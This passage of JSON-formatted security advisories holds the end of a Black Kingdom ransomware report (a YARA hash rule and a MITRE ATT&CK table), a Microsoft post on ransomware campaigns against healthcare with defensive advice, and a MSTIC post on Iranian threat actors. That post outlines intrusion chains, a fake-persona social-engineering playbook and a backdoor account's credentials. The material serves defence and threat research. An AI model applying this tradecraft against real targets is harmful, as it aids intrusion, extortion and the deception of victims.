\"910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db\"\n \n condition:\n \n hash.sha256(pe.rich_signature.clear_data) == \"0e7d0db29c7247ae97591751d3b6c0728aed0ec1b1f853b25fc84e75ae12b7b8\"\n }\n\n## Appendix II \u2013 MITRE ATT&CK Mapping\n\nThis table contains all TTPs identified during the analysis of the activity described in this report.\n\n**Tactic** | **Technique.** | **Technique Name. ** \n---|---|--- \n**Execution** | **T1047** | **Windows Management Instrumentation** \n**T1059** | **Command and Scripting Interpreter** \n**T1106** | **Native API** \n**Persistence** | **T1574.002** | **DLL Side-Loading** \n**T1546.011** | **Application Shimming** \n**T1547.001** | **Registry Run Keys / Startup Folder** \n**Privilege Escalation** | **T1055** | **Process Injection** \n**T1574.002** | **DLL Side-Loading** \n**T1546.011** | **Application Shimming** \n**T1134** | **Access Token Manipulation** \n**T1547.001** | **Registry Run Keys / Startup Folder** \n**Defense Evasion** | **T1562.001** | **Disable or Modify Tools** \n**T1140** | **Deobfuscate/Decode Files or Information** \n**T1497** | **Virtualization/Sandbox Evasion** \n**T1027** | **Obfuscated Files or Information** \n**T1574.002** | **DLL Side-Loading** \n**T1036** | **Masquerading** \n**T1134** | **Access Token Manipulation** \n**T1055** | **Process Injection** \n**Credential Access** | **T1056** | **Input Capture** \n**Discovery** | **T1083** | **File and Directory Discovery** \n**T1082** | **System Information Discovery** \n**T1497** | **Virtualization/Sandbox Evasion** \n**T1012** | **Query Registry** \n**T1518.001** | **Security Software Discovery** \n**T1057** | **Process Discovery** \n**T1018** | **Remote System Discovery** \n**T1016** | **System Network Configuration Discovery** \n**Collection** | **T1560** | **Archive Collected Data** \n**T1005** | **Data from Local System** \n**T1114** | **Email Collection** \n**T1056** | **Input Capture** \n**Command and Control** | **T1573** | **Encrypted Channel** \n**Impact** | **T1486** | **Data Encrypted for Impact**", "cvss3": {}, "published": "2021-06-17T10:00:41", "type": "securelist", "title": "Black Kingdom ransomware", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-06-17T10:00:41", "id": "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "href": "https://securelist.com/black-kingdom-ransomware/102873/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2020-04-30T23:04:13", "description": "At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.\n\nMultiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.\n\nThe ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of [human-operated ransomware](<https://aka.ms/human-operated-ransomware>) campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.\n\nMany of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker\u2019s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.\n\nIn this blog, we share our in-depth analysis of these ransomware campaigns. Below, we will cover:\n\n * Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n * A motley crew of ransomware payloads\n * Immediate response actions for active attacks\n * Building security hygiene to defend networks against human-operated ransomware\n * Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWe have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).\n\n## Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n\nWhile the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.\n\nIn stark contrast to attacks that deliver ransomware via email\u2014which tend to unfold much faster, with ransomware deployed within an hour of initial entry\u2014the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.\n\nTo gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:\n\n * Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)\n * Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords\n * Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers\n * Citrix Application Delivery Controller (ADC) systems affected by [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)\n * Pulse Secure VPN systems affected by [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nApplying security patches for internet-facing systems is critical in preventing these attacks. It\u2019s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), [CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>).\n\nLike many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.\n\nAs with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it\u2019s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.\n\n## A motley crew of ransomware payloads\n\nWhile individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.\n\n\n\n### RobbinHood ransomware\n\nRobbinHood ransomware operators gained some attention for [exploiting vulnerable drivers](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.\n\n### Vatet loader\n\nAttackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.\n\nThe group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.\n\nUsing Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>), brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.\n\n### NetWalker ransomware\n\nNetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec, and eventually deploying the same NetWalker ransomware.\n\n### PonyFinal ransomware\n\nThis Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren\u2019t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.\n\n### Maze ransomware\n\nOne of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.\n\nMaze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.\n\nIn a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.\n\nAfter gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.\n\n### REvil ransomware\n\nPossibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers \u2013 and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.\n\n### Other ransomware families\n\nOther ransomware families used in human-operated campaigns during this period include:\n\n * Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks\n * RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials\n * MedusaLocker, which is possibly deployed via existing Trickbot infections\n * LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally\n\n## Immediate response actions for active attacks\n\nWe highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. Malicious behaviors relevant to these attacks that defenders should pay attention to include:\n\n * Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities\n * Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials\n * Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data\n\nCustomers using [Microsoft Defender Advanced Threat Protection (ATP)](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) can consult a companion [threat analytics](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/threat-analytics>) report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) service can also refer to the [targeted attack notification](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts#targeted-attack-notification>), which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.\n\nIf your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ \u201cone-time use\u201d infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic behavioral based hunting where possible, and hardening infrastructure weaknesses favored by these attackers as soon as possible.\n\n### Investigate affected endpoints and credentials\n\nInvestigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.\n\n * For endpoints onboarded to [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>), use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.\n * Otherwise, check the Windows Event Log for post-compromise logons\u2014those that occur after or during the earliest suspected breach activity\u2014with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.\n\n### Isolate compromised endpoints\n\nIsolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. [Isolate machines](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-machines-from-the-network>) using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.\n\n### Address internet-facing weaknesses\n\nIdentify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as [_shodan.io_](<https://www.shodan.io/>), to augment your own data. Systems that should be considered of interest to attackers include:\n\n * RDP or Virtual Desktop endpoints without MFA\n * Citrix ADC systems affected by CVE-2019-19781\n * Pulse Secure VPN systems affected by CVE-2019-11510\n * Microsoft SharePoint servers affected by CVE-2019-0604\n * Microsoft Exchange servers affected by CVE-2020-0688\n * Zoho ManageEngine systems affected by CVE-2020-10189\n\nTo further reduce organizational exposure, Microsoft Defender ATP customers can use the [Threat and Vulnerability Management (TVM)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.\n\n### Inspect and rebuild devices with related malware infections\n\nMany ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.\n\n## Building security hygiene to defend networks against human-operated ransomware\n\nAs ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions\u2014credential hygiene, minimal privileges, and host firewalls\u2014to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.\n\nApply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:\n\n * Randomize local administrator passwords using a tool such as LAPS.\n * Apply [Account Lockout Policy](<https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-policy>).\n * Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.\n * Utilize [host firewalls to limit lateral movement](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>). Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.\n * Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Follow standard guidance in the [security baselines](<https://techcommunity.microsoft.com/t5/microsoft-security-baselines/bg-p/Microsoft-Security-Baselines>) for Office and Office 365 and the Windows security baselines. Use [Microsoft Secure Score](<https://docs.microsoft.com/en-us/microsoft-365/security/mtp/microsoft-secure-score-preview>) assesses to measures security posture and get recommended improvement actions, guidance, and control.\n * Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n * Turn on [attack surface reduction rules](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>), including rules that can block ransomware activity: \n * Use advanced protection against ransomware\n * Block process creations originating from PsExec and WMI commands\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n\nFor additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read [Human-operated ransomware attacks: A preventable disaster](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n\n## Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWhat we\u2019ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services\u2014in this time of global crisis\u2014that their attacks cause.\n\nHuman-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. And if they can\u2019t break through a wall, they\u2019ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.\n\n[Microsoft Threat Protections (MTP)](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.\n\nThrough built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.\n\nMicrosoft Threat Protection is also part of a [chip-to-cloud security approach](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) that combines threat defense on the silicon, operating system, and cloud. Hardware-backed security features on Windows 10 like address space layout randomization (ASLR), Control Flow Guard (CFG), and others harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. On [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default.\n\nWe continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the [Microsoft Detection and Response (DART) team](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\n \n\n_Microsoft Threat Protection Intelligence Team_\n\n \n\n## Appendix: MITRE ATT&CK techniques observed\n\nHuman-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.\n\nCredential access\n\n * [T1003 Credential Dumping](<https://attack.mitre.org/techniques/T1003/>) | Use of LaZagne, Mimikatz, LsaSecretsView, and other credential dumping tools and exploitation of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) on vulnerable endpoints\n\nPersistence\n\n * [T1084 Windows Management Instrumentation Event Subscription](<https://attack.mitre.org/techniques/T1084/>) | WMI event subscription\n * [T1136 Create Account](<https://attack.mitre.org/techniques/T1136/>) | Creation of new accounts for RDP\n\nCommand and control\n\n * [T1043 Commonly Used Port](<https://attack.mitre.org/techniques/T1043/>) | Use of port 443\n\nDiscovery\n\n * [T1033 System Owner/User Discovery](<https://attack.mitre.org/techniques/T1033/>) | Various commands\n * [T1087 Account Discovery](<https://attack.mitre.org/techniques/T1087/>) | LDAP and AD queries and other commands\n * [T1018 Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>) | Pings, qwinsta, and other tools and commands\n * [T1482 Domain Trust Discovery](<https://attack.mitre.org/techniques/T1482/>) | Domain trust enumeration using Nltest\n\nExecution\n\n * [T1035 Service Execution](<https://attack.mitre.org/techniques/T1035/>) | Service registered to run CMD (as ComSpec) and PowerShell commands\n\nLateral movement\n\n * [T1076 Remote Desktop Protocol](<https://attack.mitre.org/techniques/T1076/>) | Use of RDP to reach other machines in the network\n * [T1105 Remote File Copy](<https://attack.mitre.org/techniques/T1105/>) | Lateral movement using WMI and PsExec\n\nDefense evasion\n\n * [T1070 Indicator Removal on Host](<https://attack.mitre.org/techniques/T1070/>) | Clearing of event logs using wevutil, removal of USNJournal using fsutil, and deletion of slack space on drive using cipher.exe\n * [T1089 Disabling Security Tools](<https://attack.mitre.org/techniques/T1089/>) | Stopping or tampering with antivirus and other security using ProcessHacker and exploitation of vulnerable software drivers\n\nImpact\n\n * [T1489 Service Stop](<https://attack.mitre.org/techniques/T1489/>) | Stopping of services prior to encryption\n * [T1486 Data Encrypted for Impact](<https://attack.mitre.org/techniques/T1486/>) | Ransomware encryption\n\nThe post [Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-28T16:00:49", "type": "mssecure", "title": "Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-10189"], "modified": "2020-04-28T16:00:49", "id": "MSSECURE:E3C8B97294453D962741782EC959E79C", "href": "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-19T19:09:58", "description": "Over the past year, the Microsoft Threat Intelligence Center (MSTIC) has observed a gradual evolution of the tools, techniques, and procedures employed by malicious network operators based in Iran. At [CyberWarCon 2021](<https://www.cyberwarcon.com/>), MSTIC analysts presented their analysis of these trends in Iranian nation state actor activity during a session titled \u201c_The Iranian evolution: Observed changes in Iranian malicious network operations_\u201d. This blog is intended to summarize the content of that research and the topics covered in their presentation and demonstrate MSTIC\u2019s ongoing efforts to track these actors and protect customers from the related threats.\n\nMSTIC consistently tracks threat actor activity, including the groups discussed in this blog, and works across Microsoft Security products and services to build detections into our products that improve customer protections. We are sharing this blog today so that others in the community can also be aware of the latest techniques we have observed being used by Iranian actors.\n\nAs with any observed nation-state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to help secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.\n\nThree notable trends in Iranian nation-state operators have emerged:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\n## Ransomware\n\nSince September 2020, MSTIC has observed six Iranian threat groups deploying ransomware to achieve their strategic objectives. These ransomware deployments were launched in waves every six to eight weeks on average.\n\n\n\n_Figure 1: Timeline of ransomware attacks by Iranian threat actors_\n\nIn one observed campaign, PHOSPHORUS targeted the Fortinet FortiOS SSL VPN and unpatched on-premises Exchange Servers globally with the intent of deploying ransomware on vulnerable networks. A recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describes a similar intrusion in which actors leveraged vulnerabilities in on-premise Exchange Servers to compromise a victim environment and encrypt systems via BitLocker. MSTIC also attributes this activity to PHOSPHORUS. PHOSPHORUS operators conducted widespread scanning and ransomed targeted systems through a five-step process: Scan, Exploit, Review, Stage, Ransom.\n\n### Scan\n\nIn the early part of 2021, PHOSPHORUS actors scanned millions of IPs on the internet for Fortinet FortiOS SSL VPN that were vulnerable to [CVE-2018-13379](<https://www.fortiguard.com/psirt/FG-IR-18-384>). This vulnerability allowed the attackers to collect clear-text credentials from the sessions file on vulnerable Fortinet VPN appliances. The actors collected credentials from over 900 Fortinet VPN servers in the United States, Europe, and Israel so far this year. In the last half of 2021, PHOSPHORUS shifted to scanning for unpatched on-premises Exchange Servers vulnerable to ProxyShell ([CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>)).\n\n### Exploit\n\nWhen they identified vulnerable servers, PHOSPHORUS sought to gain persistence on the target systems. In some instances, the actors downloaded a Plink runner named _MicrosoftOutLookUpdater.exe_. This file would beacon periodically to their C2 servers via SSH, allowing the actors to issue further commands. Later, the actors would download a custom implant via a Base64-encoded PowerShell command. This implant established persistence on the victim system by modifying startup registry keys and ultimately functioned as a loader to download additional tools.\n\n### Review\n\nAfter gaining persistence, PHOSPHORUS actors triaged hundreds of victims to determine which of them were fitting for actions on objectives. On select victims, operators created local administrator accounts with a with a username of \u201chelp\u201d and password of \u201c_AS_@1394\u201d via the commands below. On occasion, actors dumped LSASS to acquire credentials to be used later for lateral movement.\n\n\n\n### Stage and Ransom\n\nFinally, MSTIC observed PHOSPHORUS employing BitLocker to encrypt data and ransom victims at several targeted organizations. BitLocker is a full volume encryption feature meant to be used for legitimate purposes. After compromising the initial server (through vulnerable VPN or Exchange Server), the actors moved laterally to a different system on the victim network to gain access to higher value resources. From there, they deployed a script to encrypt the drives on multiple systems. Victims were instructed to reach out to a specific Telegram page to pay for the decryption key.\n\n\n\n## Patience and persistence\n\nMSTIC has observed PHOSPHORUS threat actors employing social engineering to build rapport with their victims before targeting them. These operations likely required significant investment in the operator\u2019s time and resources to refine and execute. This trend indicates PHOSPHORUS is either moving away from or expanding on their past tactics of sending unsolicited links and attachments in spear-phishing email campaigns to attempt credential theft.\n\n### PHOSHORUS \u2013 Patient and persistent\n\nPHOSPHORUS sends \u201cinterview requests\u201d to target individuals through emails that contain tracking links to confirm whether the user has opened the file. Once a response is received from the target user, PHOSPHORUS attackers send a link to a benign list of interview questions hosted on a cloud service provider. The attackers continue with several back-and-forth conversations discussing the questions with the target user before finally sending a meeting invite with a link masquerading as a Google Meeting.\n\nOnce the meeting invite is sent, the attackers continuously reach out to the target user, asking them to test the Google Meeting link. The attackers contact the targeted user multiple times per day, continuously pestering them to click the link. The attackers even go so far as to offer to call the target user to walk them through clicking the link. The attackers are more than willing to troubleshoot any issues the user has signing into the fake Google Meeting link, which leads to a credential harvesting page.\n\nMSTIC has observed PHOSPHORUS operators become very aggressive in their emails after the initial lure is sent, to the point where they are almost demanding a response from the targeted user.\n\n### CURIUM \u2013 In it for the long run\n\nCURIUM is another Iranian threat actor group that has shown a great deal of patience when targeting users. Instead of phishing emails, CURIUM actors leverage a network of fictitious social media accounts to build trust with targets and deliver malware.\n\nThese attackers have followed the following playbook:\n\n * Masquerade as an attractive woman on social media\n * Establish a connection via social media with a target user via LinkedIn, Facebook, etc.\n * Chat with the target daily\n * Send benign videos of the woman to the target to prime them to lower their guard\n * Send malicious files to the target similar the benign files previously sent\n * Request that the target user open the malicious document\n * Exfiltrate data from the victim machine\n\nThe process above can take multiple months from the initial connection to the delivery of the malicious document. The attackers build a relationship with target users over time by having constant and continuous communications which allows them to build trust and confidence with the target. In many of the cases we have observed, the targets genuinely believed that they were making a human connection and not interacting with a threat actor operating from Iran.\n\nBy exercising patience, building relationships, and pestering targets continuously once a relationship has been formed, Iranian threat actors have had more success in compromising their targets.\n\n## Brute force\n\nIn 2021, MSTIC observed DEV-0343 aggressively targeting Office 365 tenants via an ongoing campaign of password spray attacks. DEV-0343 is a threat actor MSTIC assesses to be likely operating in support of Iranian interests. MSTIC has [blogged about DEV-0343 activity previously](<https://www.microsoft.com/security/blog/2021/10/11/iran-linked-dev-0343-targeting-defense-gis-and-maritime-sectors/>).\n\nAnalysis of Office 365 logs suggests that DEV-0343 is using a red team tool like [o365spray](<https://github.com/0xZDH/o365spray>) to conduct these attacks.\n\nTargeting in this DEV-0343 activity has been observed across defense companies that support United States, European Union, and Israeli government partners producing military-grade radars, drone technology, satellite systems, and emergency response communication systems. Further activity has targeted customers in geographic information systems (GIS), spatial analytics, regional ports of entry in the Persian Gulf, and several maritime and cargo transportation 